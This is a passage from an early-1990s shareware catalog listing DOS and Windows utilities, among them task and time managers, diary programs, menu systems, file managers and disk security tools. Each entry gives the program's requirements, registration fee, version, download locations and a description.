301-969-9385 + Registration: $30.00 + Version: 2.11 (01-05-91) + User benefits: Printed Manual & Latest Disk; + Phone,CompuServ,GEnie Support; Priority Enhancement + Consideration. + Look for: RTM211.EXE on BBSs (call 414-789-4210 to download it at + no charge); RTM211.EXE in IBMSYS forum LIB 7 on CompuServe; + RTM211.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 140k + Description: + Manages lists of Tasks, Reminders, Ticklers, or ToDo's. Loads + as 6K TSR or Normal Task. Available anytime! Features: Task's, + Priorities, 5 line Descriptions, User Field, Pull-Down Menus, + Audit Files. 3 Level Sort, Task Transfer, Print to Disk, Audit + Browse. Optionally Integrates with Sidekick + and 2.0 (via + CALRPT/SK2) for Task-Calendar Mgmt; Find Task, DOS Shell, File + Linking, Single Swap File, More + + Product: See Mail [***] + E-mail facility, combines MCI with LAN e-mail. See full + description on page 164. + + Product: Sell More Software + Sales and Marketing for Software Developers. See full + description on page 211. + + Product: STAFF-BASE + Flat File DBMS with relations to other DBF's. See full + description on page 138. + + Product: STAFF-DIAL + Dialing with phone numbers stored in DBF file. See full + description on page 84. + + Product: STAFF-KICK + TSR DBMS compatible with dBASE III Plus. See full description + on page 138. + + Chapter 2, "Utilities" 90 + + + + Product: Tikler + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Author: Olsen Outdoors, 508-486-3042 + Registration: $15.00 + Version: 3.95 (03-22-91) + User benefits: Newest version sent. Unlimited phone, CIS, mail + and BBS support. + Look for: TIK395.ZIP on BBSs (call 508-875-3618 to download it at + no charge); TIK395.ZIP in IBMSYS forum LIB 7 on CompuServe. + Download size: 38k + Description: + A quick and easy appointment/event reminder program. Nothing + fancy, just the essentials. Handles up to 600 events and + supports passwords and encription of your event files. Can be + run from your AUTOEXEC.BAT file so it will pop onto your screen + when you turn on your computer. TIKLER has been called the + easiest to use program of its type by many of its loyal users. + Once you've used this program, you'll find it indispensable. + + 2.6.9 Time management + + Product: APCAL [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Gamma Software, 303-667-9960 + Registration: $35.00 + Version: 3.10 (01-10-92) + User benefits: Printed manual, master disks. + Look for: APCAL310.ZIP on BBSs; APCAL3.ZIP in IBMNET forum LIB 7 + on CompuServe; APCAL.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 141k + Description: + This personal calendar is extremely easy to use because the + screens are set up in formats you are already fimiliar with. + For example it contains monthly calendars with day blocks in + which you can type notes like a wall calendar. Appt screens are + set up like most appointment books, simply type appt next to + time. Configure appt times to match your schedule. Appt + features include: move,copy,del,search and more. Quickly scan + for an open time slot. Popup reminders, year display, + printouts, and more. + + Product: Early Bird + Great Full-Featured Reminder/Calendar Program. See full + description on page 79. + + Product: InContext + DOS shell+, based on principles of human work. See full + description on page 106. + + Product: Personal Calendar (PC) for DOS [***] + TSR PIM Appointment Reminder, Clock, Calendar. See full + description on page 88. + + Chapter 2, "Utilities" 91 + + + + Product: Personal Time Card [***] + Needs: IBM AT (80286), Windows 3.0 or better. Strongly + recommended: IBM 80386 computer running Windows in Enhanced + mode. + Author: Fischer Grafix & Software + Registration: $20.00 + Version: 1.0 (02-03-92) + User benefits: Master disks, phone/fax support. + Look for: PTC.ZIP on BBSs; PTC.ZIP in IBMAPP forum LIB 6 on + CompuServe. + Download size: 260k + Description: + Keep your project time organized either daily or weekly. PTC + will keep your time cards in order of date and allow entries + for job number (project), description and time (regular and + overtime). PTC will print the cards for hard copies and back-up + your files to diskette. Multiple users need only create a + directory for each user to store files. + + Product: Resident Task Manager + Task/ToDo List Manager; Reminders & Ticklers. See full + description on page 89. + + Product: Tikler + Quick, easy, appointment/event reminder. See full description + on page 89. + + Product: TimeTrac + Time & Expense tracking; TSR, Export, LANs. See full + description on page 196. + + Product: TrikTrak [***] + Needs: IBM PC, DOS 2.0 or better. + Author: Rhode Island Soft Systems, Inc., 401-658-4632 + Registration: $69.00 + Version: 2.0a (03-01-92) + User benefits: Printed manual, BBS/newsletter support. + Look for: TTRAK20A.ZIP on BBSs (call 401-658-3465 to download it + at no charge); TTRAK2.ZIP in IBMAPP forum LIB 7 on CompuServe; + TTRAK20A.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 250k + Description: + Replaces white dry erase boards and other large scheduling + sheets. Allows users to create their own custom applications, + much in the same fashion as a spreadsheet program allows users + to create their own spreadsheets. With the AutoTrak feature, + users can have the computer pop up the next event for any + resource as the day progresses. Comes with several sample + applications including one for restaurant table reservations, a + message taker for a departmental secretary, and more! + + Chapter 2, "Utilities" 92 + + + + 2.6.10 Journal/diary programs + + Product: Ample Notice + Very flexible appointment scheduler/alarm. See full + description on page 77. + + Product: Cumberland Diary [***] + Diary/ Journal Entry Program. See full description on + page 344. + + Product: FISHBYTE(tm) [***] + Fishing and Loran Log for Saltwater Anglers. See full + description on page 339. + + Product: MENU ACE + PC menu, datebook, calendar system. See full description on + page 97. + + Product: OMNIDay + Needs: IBM PC, DOS 2.1 or better. IBM Graphics Or LaserJet + printer. + Author: Unicorn Software Limited, 219-563-HOME + Registration: $25.00 + Version: 2.29b (12-18-91) + User benefits: Master disks, phone/BBS/mail support. Shareware + disks of other programs. + Look for: ODAY229B.ZIP on BBSs (call 317-784-2147 to download it + at no charge); ODAY.ZIP in IBMAPP forum LIB 7 on CompuServe. + Download size: 170k + Description: + A benchmark system for electronic diary programs! Allows up to + 10 users, each with their own passcode. Optional encryption of + the opus (up to 10,000 possibilities). The user names the opus + and enters their own name as author. Automatic entry of text + date line, entry can be up to 5000 lines long. User can update + and delete entries. Will print out opus for selected dates or + all. Full featured text editor with on line help. Import + feature for those who travel. DOC file includes diary keeping + tips. + + Product: Resident Task Manager + Task/ToDo List Manager; Reminders & Ticklers. See full + description on page 89. + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 201. + + Chapter 2, "Utilities" 93 + + + + 2.7 Menu systems & file managers + + 2.7.1 Menu systems + + Product: ActMenu + Needs: IBM PC, DOS 3.0 or better. + Author: ShareGames, 619-283-0472 + Registration: $25.00 + Version: 5.9 (05-04-91) + User benefits: Latest Version, Free updates for 6 Months, & 24 Hr + Tech Support. + Look for: ACTMENU.ZIP on BBSs (call 619-440-0899 to download it + at no charge). + Download size: 152k + Description: + Puts the full power of DOS into single key or click menus. + Starter menus are provided and Help is available throughout. + Each, of up 43 menus, allow up to 51 keys and any menu can + access any other menu. Each key executes up to three BAT + statements. Menus can be customized with the internal or any + ASCII editor. Works with ActCalendar to display daily + reminders. There's also a phone directory (w/auto first letter + search), a modem dialer, and built in screen blanker. + + Product: BatchMaker Plus + A DOS Menu/Utility/Editor/Information + more. See full + description on page 7. + + Product: BATUTIL + Batch Enhancement Language. See full description on page 63. + + Product: BCS Menu Program + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: Bristol Computing Systems, Inc. + Registration: $34.95 + Version: 2.0 (12-10-90) + User benefits: Diskette and printed manual. + Look for: availability unknown on BBSs; BCSMNU.ZIP in IBMSYS + forum LIB 5 on CompuServe; BCSMNU20.ZIP in IBMPC RTC LIB 5 on + GEnie. + Download size: 195k + Description: + Complete menu program with mouse support, palette control on + EGA/VGA. Supports MDA, CGA, EGA, VGA and 8514a displays. Pop-up + Windows. Command Helper (disk browser) automates building menu + entries. Screen blanker with user entered message. Flexible + menu screen formatting. Up to 100 entries per menu. Unlimited + menus. All commands are executed directly from memory - does + not use batch files. Uses only 2.5k RAM during command + execution. Not a TSR. Many other features. + + Chapter 2, "Utilities" 94 + + + + Product: Bmenu + Needs: IBM PC, DOS 3.1 or better. + Author: Mark Strong + Registration: $15.00 + Version: 5.41 (09-17-90) + User benefits: One time registration valid for all future + versions, notification of major updates, Support via CompuServe + Mail or U.S. Mail. + Look for: BMENU54.ZIP on BBSs (call 513-779-3489 to download it + at no charge); BMEN54.ZIP in SYSUTIL forum LIB 1 on CompuServe. + Download size: 29k + Description: + Provides pop-up menus within a batch file of any size or + position on the screen, as specified on the command line. + Color, title and choices can be listed on a single line to + produce a complete menu on the screen. Several menus can also + be read from an @file with an indexed marker. Returns + errorlevel (like ASK) for use in batch file branching. Very + flexible for networks as a user interface or on install disks + for user input. + + Product: BOOT.SYS + Use boot-up menus to select system config. See full + description on page 70. + + Product: DaMenu [***] + DaMenu - Dos Application MENuing Utility. See full description + on page 13. + + Product: DAYO MENU + Needs: IBM PC, DOS 3.3 or better. 530k RAM; Hard Disk. + Author: TJS LAB, Inc., 407-291-3960 + Registration: $25.00 + Version: 3.0 (06-28-91) + User benefits: Multiuser, Manual (printed & disk), Phone Support. + Look for: DAYOME.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOME.ZIP in IBMAPP forum LIB 6 on CompuServe; + DAYOME.ZIP in IBM RTC LIB 3 on GEnie. + Download size: 250k + Description: + A simple DOS level menu system for use with the DAYO line of + Business Applications. Many features are available as menu + options, ie: 18 screen fonts, 25, 43, or 50 lines per page, + system statistics, view user manuals, and more. + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 7. + + Chapter 2, "Utilities" 95 + + + + Product: Easy Access + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Author: TengWare Enterprises, 714-587-1025 + Registration: $25.00 + Version: 6.2a (05-20-91) + User benefits: Latest version of program, TengWare logo will no + longer display upon startup, you will be informed of future + enhancements. + Look for: EZ62.ZIP on BBSs; EASY.ZIP in IBMSYS forum LIB 5 on + CompuServe; EASY62.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 188k + Description: + This professional menu system is perfect for either home or + office. It is simple to maintain yet has the features required + by the most demanding user. Features: + * Simple set up & maintenance + * User defined colors & headings + * Calendar & Reminder subsystem + * User log on & usage logging (optional) + * 2 levels of password protection + * Point & Shoot & mouse support + * 26 options per menu with unlimited submenus + * On line help + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real Batch Language you wish DOS had. See full description + on page 65. + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 104. + + Product: Folders + Needs: IBM PC, Windows 3.0 or better. EGA or Hercules monitor. + Author: Sloop Software, 719-260-0433 + Registration: $35.00 + Version: 3.4a (07-29-91) + User benefits: Printed manual, master disks. Unlimited mail + support. + Look for: availability unknown on BBSs; FOLDER.ZIP in WINADV + forum LIB 10 on CompuServe. + Download size: 85k + Description: + Gives the ability equivalent to being able to create subgroups + in Program Manager groups. Features include no limit on + nesting folders within folders. Move or copy items using a + drag/drop interface. Multi-select capability when adding, + deleting, moving or copying items. Display items as icons or + only names. Simple, easy to use icon selector using an icon + browser dialog box. Password protection. Run command with + browse button which stores last twelve commands entered. + + Chapter 2, "Utilities" 96 + + + + Product: Getkey/2 + Reports user keystroke as an ERRORLEVEL. See full description + on page 65. + + Product: HDM IV - Hard Disk Menu + Needs: IBM PC, DOS 2.0 or better. 300k RAM to hold program and + tables, but uses 0K (no bytes) when running a program, command, + or batch file. + Author: MicroFox Company, 216-659-9489 + Registration: $35.00 + Version: IV 3.10 (06-28-91) + User benefits: Unlimited free support via mail, phone, + CompuServe. $50 gets latest disks & published user manual. + Can be beta tester for new unreleased version. + Look for: HDM431.ZIP on BBSs (call 216-661-9065 to download it at + no charge); HDM431.ZIP in IBMSYS forum LIB 5 on CompuServe; + HDM431.ZIP in IBM RTC LIB 0 on GEnie. + Download size: 222k + Description: + A DOS shell that hides the underlying operating system from the + uninitiated user, yet does not get in the way of the expert + user. Features: network & mouse support, multi-level security + system, usage logging, phone dialer, variable screen blanker, + timed execution, multi- user log on/off with passwords, + extensive on-line help, file and directory pick lists, user + defined logo screen, DOS window, pass keystrokes to user + programs, 260,000 menu entries, non-TSR. + + Product: Launcher + Needs: IBM PC, DOS 2.0 or better. + Author: Richard W. Adams + Registration: $15.00 + Version: 1.21 (06-09-91) + User benefits: Eligibility for free upgrades. + Look for: LAUND121.ZIP on BBSs; LAUND1.ZIP in IBMSYS forum LIB 1 + on CompuServe. + Download size: 23k + Description: + Passes user entered strings as arguments to a program, which is + loaded & run. Use this utility to get user input (e.g., file + name, password, etc.) before starting a program. Especially + useful when running programs from a batch file or menu system, + when the program arguments vary. Options to hide input, + restrict input length, compare input to an edit mask, verify + input, etc. + + Chapter 2, "Utilities" 97 + + + + Product: LOGIK MENU + Needs: IBM PC, DOS 3.0 or better. 384k RAM, hard disk. + Author: LOGIVISION INC., 819-823-6761 + Registration: $55.00 + Version: 1.61 (07-10-91) + User benefits: Printed manual, master disks, phone/fax/ + newsletter/mail support, bonus utilities, Free updates (you pay + P&H). + Look for: LM161.ZIP on BBSs; LM161.ZIP in IBMSYS forum LIB 5 on + CompuServe; LM161.ZIP in IBMPC RTC LIB 3 on GEnie. + Download size: 294k + Description: + Designed for ease of use at the touch of a key. Extensive on- + line help, EGA/VGA 43/50 line mode supported, true mouse + support (Point & Shoot), has passwords, screen saver, hidden + "hot" keys, usage log report, event tracking (reminds you + important dates), uses 0 memory, customizable help... Automatic + installation (from beginners to experienced user) scans your + hard drive for popular programs. + + 50 items per menu 50 sub-menus (multiple levels) 80 commands + per option 30 General Hidden Hot Keys + + Product: MENU ACE + Needs: IBM PC, DOS 2.0 or better. + Author: Blue Ace Software + Registration: $20.00 + Version: 1.20 (11-30-91) + User benefits: Copy of latest version and manual. Disounts to + future upgrades. Phone support. + Look for: availability unknown on BBSs; MACE12.ZIP in IBMSYS + forum LIB 5 on CompuServe. + Download size: 175k + Description: + Unlimited menus and complete user customization make Menu Ace + so versatile. Features include: Datebook that can be used as an + electronic diary/notepad/reminder system; Calendar can find + days between dates, future dates and years with cooresonding + Datebook entry; automatic program re-execution incase of power + failure; usage logging; screen blanker/clock; full mouse + support; custom menu titles and messages; more! Easy to use and + set up. Novice and experienced users. + + Chapter 2, "Utilities" 98 + + + + Product: MenuEase + Needs: IBM PC, DOS 2.0 or better. Hard Disk, 256k RAM. + Author: Creative Computer, 714-687-2421 + Registration: $45.00 + Version: 1.6.3 (08-10-91) + User benefits: Latest version disk, printed manual, 60 days phone + support, and additional utilities. + Look for: MENUEASE.ZIP on BBSs (call 213-609-2176 to download it + at no charge). + Download size: 360k + Description: + Provides unlimited menus with up to 26 menu items/menu and up + to seven commands per menu item. MenuEase allows separate menus + or common menus for an unlimited number of users. A complete + password system protects DOS access, menu maintenance, system + configuration, menu items, and submenus. Each menu item can + force MenuEase to be remain in memory or remove itself + completely from memory when executed. Custom colors and all + video adapters are supported. Usage logging for businesses is + provided. + + Product: Painless Menu Manager + Needs: IBM PC, DOS 2.1 or better. 640k RAM, hard disk. + Author: Painless Accounting, 800-521-9905 + Registration: $20.00 + Version: 5.0 (08-31-91) + User benefits: Latest copy of the software along with a printed + manual. Also receive major discounts on updates. + Look for: PAM.ARC on BBSs (call 214-881-0313 to download it at no + charge); PAM.ARC in IBMSYS forum LIB 3 on CompuServe; PAM.ARC + in IBM RTC LIB 3 on GEnie. + Download size: 150k + Description: + Great Hard Disk Menuing System. Some features include: mouse + support, movable/resizable windows, phone directory and dialer, + appointment scheduler, unlimited menu options, VGA/EGA support, + copy/delete/rename/move/view/backup/restore files, tree + directories, word processor, calendar, notepad, calculator, + color parameters, password protection, screen saver and much + more. + + Product: PC SYSTEM MANAGER + Needs: IBM PC, DOS 2.1 or better. 256k RAM, hard disk. + Author: MORSOFT, 512-561-0731 + Registration: $19.95 + Version: 2.0 (07-01-90) + User benefits: Printed manual, phone support. + Look for: availability unknown on BBSs; PCSMINS*.ZIP in IBMPC RTC + LIB 5 (multiple files) on GEnie. + Download size: 520k + Description: + This master menuing/submenuing system has all the bells and + whistles. Up to 32,000 menus and program selections, customized + run time help, customized command line replaceable parameter + + Chapter 2, "Utilities" 99 + + + + prompts, individual userid logon, time usage tracking with 4 + detail and summary reports, password protection and automatic + job starting based on time & date or day of week. + + Product: PullDown SAA Menu Shell + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: MicroDynamics Development, 215-367-1891 + Registration: $34.95 + Version: 3.20 (07-08-91) + User benefits: Shrinkwrapped User's Guide with 51/4' & 31/2' + Diskettes. + Look for: CUA1OF3.ZIP (multiple files) on BBSs (call 215-623-6203 + to download it at no charge); CUA-1.ZIP in IBMSYS forum LIB 6 + (multiple files) on CompuServe. + Download size: 890k + Description: + A fully SAA compliant (Like PCTools) menu shell system for both + standalone PCs and DOS LANs. Differentiating features range + from user-defined help and full screen blanker/color + configurations to an integrated menu definition editor with + context-sensitive help and user-defined dialogs. PullDown + offers unmatched ease of use for users and maximum power to the + professional. Non-TSR design assures conflict-free reliable + operation on all DOS and LAN platforms. + + Product: Sloop Manager + Needs: IBM PC, Windows 3.0 or better. EGA or Hercules monitor. + Author: Sloop Software, 719-260-0433 + Registration: $35.00 + Version: 1.2b (01-27-92) + User benefits: Printed manual, master disks. Unlimited mail + support. + Look for: availability unknown on BBSs; SLPMAN.ZIP in WINADV + forum LIB 10 on CompuServe. + Download size: 225k + Description: + Has virtually all of Program Managers's features plus a host of + new one. Features include the ability to create folders + (groups) within folders; move or copy items using a drag/drop + interface; multi-select capability when adding, deleting, + moving or copying items; password protection; run command with + browse button which stores last twelve commands entered; + simple, easy to use icon browser dialog box; associate multiple + programs with a single extension; customizable popup run menu; + and more. + + Chapter 2, "Utilities" 100 + + + + Product: STAFF-INTEGRATOR + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Author: MSC - Morariu Software Consulting, 0049-6196-48524 + Registration: $29.00 + Version: 2.0 (01-01-91) + User benefits: Printed manual, latest version on disk, phone + support. + Look for: availability unknown on BBSs; STFINT.ZIP in IBMAPP + forum LIB 3 on CompuServe. + Download size: 264k + Special instructions: Product distribution restricted to the + United States. + Description: + A general purposed menu generator which allows the integration + of different software tools according to the priorities of the + user. The program consists of two modules: a menu generator and + a run time module for the execution of the menus. An unlimited + number of menus can be created. Each menu can have up to 32 + entries. Chains of menus can be defined. Virus control + function. Parameters (like path, file name, drive specifier, + etc.) can be passed over. Mouse support. Log file.... + + Product: Systems Manager + Reports time by client, purpose & application. See full + description on page 201. + + 2.7.2 File managers + + Product: 4EDIT + Needs: IBM PC, DOS 2.1 or better. + Author: XD Systems, 703-821-3215 + Registration: $15.00 + Version: 1.09 (10-13-91) + User benefits: Disk and printed manual; telephone and CIS + support; public domain bonus programs. + Look for: availability unknown on BBSs; 4EDIT.ZIP in IBMSYS forum + LIB 1 on CompuServe. + Download size: 73k + Description: + Adds descriptions (up to 80 characters) to MSDOS filenames and + subdirs. File descriptions allow you to identify your files in + much more meaningful ways than MS-DOS allows in an eight + character filename. 4EDIT has a convenient full-screen editor + with a cut and paste feature -- especially useful when several + files need similar descriptions. Select a grouping of files + using multiple filespecs with extended wildcards. + + For all versions of 4DOS. Supports new Ver 4.0 extended + descriptions. + + Chapter 2, "Utilities" 101 + + + + Product: 4FILES [***] + Needs: IBM PC, DOS 2.0 or better. 64k RAM. Strongly + recommended: 4DOS or NDOS. + Author: Hand-Crafted Software, 907-747-8996 + Registration: $20.00 + Version: 2S.4 (03-31-92) + User benefits: Master disks, support, free upgrade. + Look for: 4FILES2S.ZIP on BBSs (call 415-994-2944 to download it + at no charge); 4FILES.ZIP in PCVENB forum LIB 10 on CompuServe; + 4FILES2S.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 68k + Description: + A multipurpose 4DOS/NDOS-aware file manager, file annotator, + and slick front-end for your favorite utilities. The interface + is clean & convenient in every respect. + * Manage directories & files (singly or in blocks) from a + list sorted in any of several ways. + * Nice file note editor. (4DOS/NDOS keep the notes with + their files during file copy, move, etc.) + * Rapid-fire access to files w/ your browser & other + utilties. + * On-the-fly reconfiguration. + * Good documentation. + + Product: 4ZIP/4UNZIP + Includes 4DOS file descriptions in ZIP files. See full + description on page 112. + + Product: ActaeOn + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard Disk. + Author: Jon Clempner + Registration: $34.95 + Version: V1.60 (11-12-91) + User benefits: Printed manual, Notification of updates. + Look for: ACTV160.ZIP on BBSs; ACT160.ZIP in IBMSYS forum LIB 3 + on CompuServe. + Download size: 110k + Description: + A Hard Disk Manager with a point and shoot interface to DOS. + Although its ease of use will make it ideally suited to the new + user, the regular user will find it useful on a day to day + basis. In addition to most DOS commands, it has many other + features including: + * Graphical representation of Directory Tree + * Find File/Find string within files + * Add your own commands + * Full Mouse support/Scroll bars + * Text editor + * Context Sensitive help + + Product: Attribution + Changes or displays file/directory attributes. See full + description on page 33. + + Chapter 2, "Utilities" 102 + + + + Product: CM_FILER [***] + Needs: IBM PC, DOS 2.0 or better. 183k RAM. + Author: NoVaSoft, 703-221-1833 + Registration: $30.00 + Version: 5.22 (03-09-92) + User benefits: Printed manual, $10 commission per referral, one + free upgrade disk, one year support. + Look for: CM_FILER.ZIP on BBSs (call 216-381-3320 to download it + at no charge); CF522.ZIP in IBMSYS forum LIB 5 on CompuServe; + CM_FILER.ZIP in IBMPC RTC LIB 5 on GEnie. + Download size: 114k + Description: + A multi-function disk/file manager with side-by-side display of + directories OR trees. Full suite of file/directory/tree + structure services; built-in editor, file finder, notepad, + application launcher, background print spooler. Intuitive + command syntax, small and fast. Many special features such as + printing directory/tree listing, instant file freshening, + password access, file protection from inadvertent deletion. + Great for beginners and developers alike. Small at 91k, very + fast. + + Product: DIRECT MAINT + Hard disk directory and file manager. See full description on + page 14. + + Product: DIREDIT + Needs: IBM PC, DOS 2.1 or better. + Author: Computer Counselors, Inc., 215-527-4408 + Registration: $20.00 + Version: 3.05 (05-31-90) + User benefits: Latest version of program on disk. Telephone and + mail support. Notice of upgrades, bug fixes, etc. + Look for: availability unknown on BBSs; DIREDI.EXE in IBMSYS + forum LIB 1 on CompuServe. + Download size: 78k + Description: + This utility allows you to rearrange the order of files and + sub-directory entries in a DOS directory. As well as allowing + you to sort the directory in various standard ways, it allows + you to move individual files around and/or specify an arbitrary + sort order. V3.05 includes support for almost all fixed and + removable disks and for > 32 Mb devices under DOS 4.0 and 5.0 + and Compaq DOS 3.31. + + Product: Duplicate File Locator (DFL) + Prcss dups in&out ALL arcs,disks. Many modes. See full + description on page 15. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 16. + + Chapter 2, "Utilities" 103 + + + + Product: fastmenu GOLD + Graphics User Interface (GUI), Menu System. See full + description on page 104. + + Product: PMZIP + OS/2 Presentation Manager ZIP shell. See full description on + page 35. + + Product: QFiler + Needs: IBM PC, DOS 2.1 or better. + Author: Jamestown Software, 608-271-2090 + Registration: $20.00 + Version: 3.2 (07-15-91) + User benefits: Printed manual and disk; phone/BBS/newsletter + support. + Look for: QF*.* (multiple files) on BBSs (call 608-271-3685 to + download it at no charge); QF32*.EXE in IBMSYS forum LIB 5 on + CompuServe. + Download size: 150k + Description: + This powerful file manager displays two sorted directories + side-by-side. Copy, rename, move or delete both files and + directories. View file contents in ascii or hex. View and print + directory tree. Find files on any drive. Create and remove + subdirectories. Locate duplicate files. Set or clear file + attributes. Change time/date stamps. Simplify use of file + compression utilities like LHA and PKZip. Rename disk volume + labels. Undelete or edit files. XCopy directories. Send files + to print queue. + + Product: TreeTop + Needs: IBM PC, DOS 2.0 or better. Hard Disk, 256K RAM. + Author: Kilgore Software, 916-371-3715 + Registration: $39.00 + Version: 2.44 (03-02-91) + User benefits: Free technical telephone support, a bound type set + manual with a quick reference chart and the latest version on + disk. + Look for: availability unknown on BBSs; TREETO.EXE in IBMSYS + forum LIB 5 on CompuServe. + Download size: 346k + Description: + A fast, user friendly Hard Disk File and Directory Manager with + a Point & Shoot user interface. Group files by wildcards, + attributes, date/time, directory, or disk. Features include: + * Graphic display of directory tree + * Multiple logged drives + * Sort/view/copy/move/delete/print files + * Modify date/time/attr of files + * Add, delete, or rename directories + * Online context sensitive help + * Full mouse support + * Pull down menus + * Excellent use of color + + Chapter 2, "Utilities" 104 + + + + * Much, Much More! + + Product: WinZip + Windows ZIP/LZH/ARC Shell:View/Run/Extract/+. See full + description on page 37. + + Product: XDIR + Attach descriptive comments to DIR displays. See full + description on page 23. + + 2.7.3 Combined MS/FMs + + Product: Command Post + Needs: IBM PC, Windows 3.0 or better. Mouse recommended. + Author: Wilson WindowWare, Inc., 206-937-9335 + Registration: $49.95 + Version: 7.0S (02-15-91) + User benefits: Printed manual, tech support, 90 day money back + gaurantee. + Look for: CP-70S.ZIP on BBSs (call 206-935-5198 to download it at + no charge); CP-70S.ZIP in WINAPA forum LIB 15 on CompuServe. + Download size: 200k + Description: + A powerful custom menu system for Microsoft Windows that lets + you tailor your Windows-based workstation to your needs and + preferences. A single menu item can gather filenames and other + information into listboxes for the user to choose from, perform + arithmetic, parse strings, move and resize windows, read and + write WIN.INI variables, read DOS environment variables, copy, + move and delete files. Includes useful sample menus, a file + browser, and much more. + + Product: fastmenu GOLD + Needs: IBM PC, DOS 2.1 or better. VGA monitor; hard drive. + Author: jwh: SoftWare, 419-588-3608 + Registration: $60.00 + Version: 4.1 (09-01-91) + User benefits: Printed manual, 51/4' & 31/2' disks, and one year free + phone support. + Look for: GOLD41*.ZIP (multiple files) on BBSs (call 419-588-3615 + to download it at no charge); GOLD4*.ZIP in IBMSYS forum LIB 0 + (multiple files) on CompuServe. + Download size: 500k + Description: + Very attractive graphics based hard drive menuing system. Fully + mouse supported with lots of built-in utilities and options. + Totally removes itself from memory during application + execution. Full password protection with up to 40 user titled + pages with up to 20 applications per page. Includes: Phonebook + database with Dialer, Complete directory and file maintenance + module, AUTOEXEC.BAT & CONFIG.SYS file switcher, Batch/Text + file editor with cut & paste, Set Time & Date, Much Much More. + + Chapter 2, "Utilities" 105 + + + + Product: Hard Disk Director + Needs: IBM PC, DOS 2.0 or better. + Author: Canyon Software, 415-453-9779 + Registration: $40.00 + Version: 5.0 (02-09-92) + User benefits: Printed manual, master disks, phone/CompuServe/ + mail support. + Look for: availability unknown on BBSs; DIRP.ZIP in IBMSYS forum + LIB 5 (multiple files) on CompuServe. + Download size: 330k + Description: + A series of programs making up a complete hard disk menu, shell + and file manager. DL.EXE is a full featured shell. You can + mark selected directories or files for copying, moving or + removing or viewing. DB.EXE gives you a sorted file list for + any directory. DA.EXE shows you all the files on a particular + drive or drives. DM is a full featured hard disk menu. You can + add up to 20 entries to the main menu and have unlimited + submenus of up to 20 entries each. Viewer and shell for ZIP + files. + + Product: MenuDIRECT Gold + Needs: IBM PC, DOS 3.0 or better. Hard disk, 512k RAM. + Author: Applied Micro Systems Technology, 405-377-0444 + Registration: $39.95 + Version: 3.0 (06-01-91) + User benefits: Disk with latest version, manual, free support and + update notices. + Look for: MDR30.ZIP on BBSs; MDR30.ZIP in IBMSYS forum LIB 5 on + CompuServe. + Download size: 525k + Description: + Was the Point & Shoot Hard Disk Manager - all new rewrite. + Nominated for one of BYTE Magazine's best product awards at + Spring COMDEX 1991. Outstanding file/directory/program + manager. Unlimited user menus with with single-keystroke + program execution. Split-screen file list and directory tree + with all standard commands and some valuable extras. Pull-down + menus, context-sensitive help, mouse support, floppy disk + formatting, password protection, usage logging and a host of + other features. + + 2.7.4 MS/FMs for developers + + Product: Command Post + Programmable Shell/File Mgr. for Windows 3.0. See full + description on page 104. + + Product: WinBatch + Windows Batch Language. See full description on page 69. + + Chapter 2, "Utilities" 106 + + + + 2.7.5 Work environment managers + + Product: CM_FILER [***] + Multi-Function Disk/File Manager. See full description on + page 101. + + Product: InContext + Needs: IBM PC, DOS 3.0 or better. 512k RAM, hard disk. + Author: Rams' Island Software, 303-841-2848 + Registration: $60.00 + Version: 1.02 (10-21-91) + User benefits: Current and next versions; Nice typeset manual; At + least one year of voice/BBS/newsletter support; Opportunity to + test new releases. + Look for: INCX102*.ZIP (multiple files) on BBSs (call + 303-841-6269 to download it at no charge); INCXT*.ZIP in IBMSYS + forum LIB 5 (multiple files) on CompuServe. + Download size: 440k + Description: + Improves your productivity by helping you organize, manage, and + execute whatever you do on your computer. No mere DOS shell, + this program is based on the principles of human work. On top + of a unique, object-oriented DOS shell, InContext provides + well-integrated task planning and calendar management. Its + basic features are readily useable by novices, but it provides + a level of control and sophistication that will please the + expert. Great help/tutor/docs! + + + 2.8 Security programs + + "Shareware is as safe as [retail] software if obtained + directly from an author or from a vendor or BBS who + has gotten the disk directly from the author." + -- an official ASP statement on shareware + + + See also: Utilities, File utilities, Backup/restore (page 29); + Utilities, File utilities, Encryption & security (page 33); + Utilities, File utilities, File archivers (page 34); Utilities, + File utilities, File comparison (page 37); Utilities, System + Utilities, Recovery utilities (page 72). + + Product: HDM IV - Hard Disk Menu + DOS Menu & Security System, Network Support. See full + description on page 96. + + Product: LOGIK MENU + Menu System, 43/50 lines, Mouse, Events, Log. See full + description on page 96. + + Chapter 2, "Utilities" 107 + + + + Product: An Ounce Of Prevention + Needs: IBM PC, DOS 2.0 or better. Hard drive. 18k RAM for TSR + module. + Author: Pete Maclean Software + Registration: $35.00 + Version: 1.05 (07-01-91) + User benefits: Printed manual. Latest version. Update + notification. Goodies! + Look for: OZ.ZIP on BBSs; OZ.EXE in IBMSYS forum LIB 3 on + CompuServe. + Download size: 94k + Description: + Prevents disasters with your hard disks and the files on them. + Keeps "deleted" files invisibly, in limbo, available for + instant guaranteed retrieval. Saves up to 8 deleted + generations of each file, truly purging the oldest only when + disk space is exhausted. Also forcibly prevents reformats of + hard disks, elegantly describes critical disk errors, + gracefully handles disk-full conditions, and more. + + Junk your UNDELETEs and UNFORMATs! An Ounce Of Prevention is + worth a pound of messy recovery. + + Product: Shredder/2 + Needs: IBM AT (80286), OS/2 1.0 or better. + Author: Richard W. Adams + Registration: $5.00 + Version: 1.10 (01-23-91) + User benefits: Eligibility for free upgrades. + Look for: SHREO110.ZIP on BBSs; SHRE02.ZIP in IBMSYS forum LIB 2 + on CompuServe. + Download size: 25k + Description: + This Presentation Manager program securely erases files so no + one can retrieve their 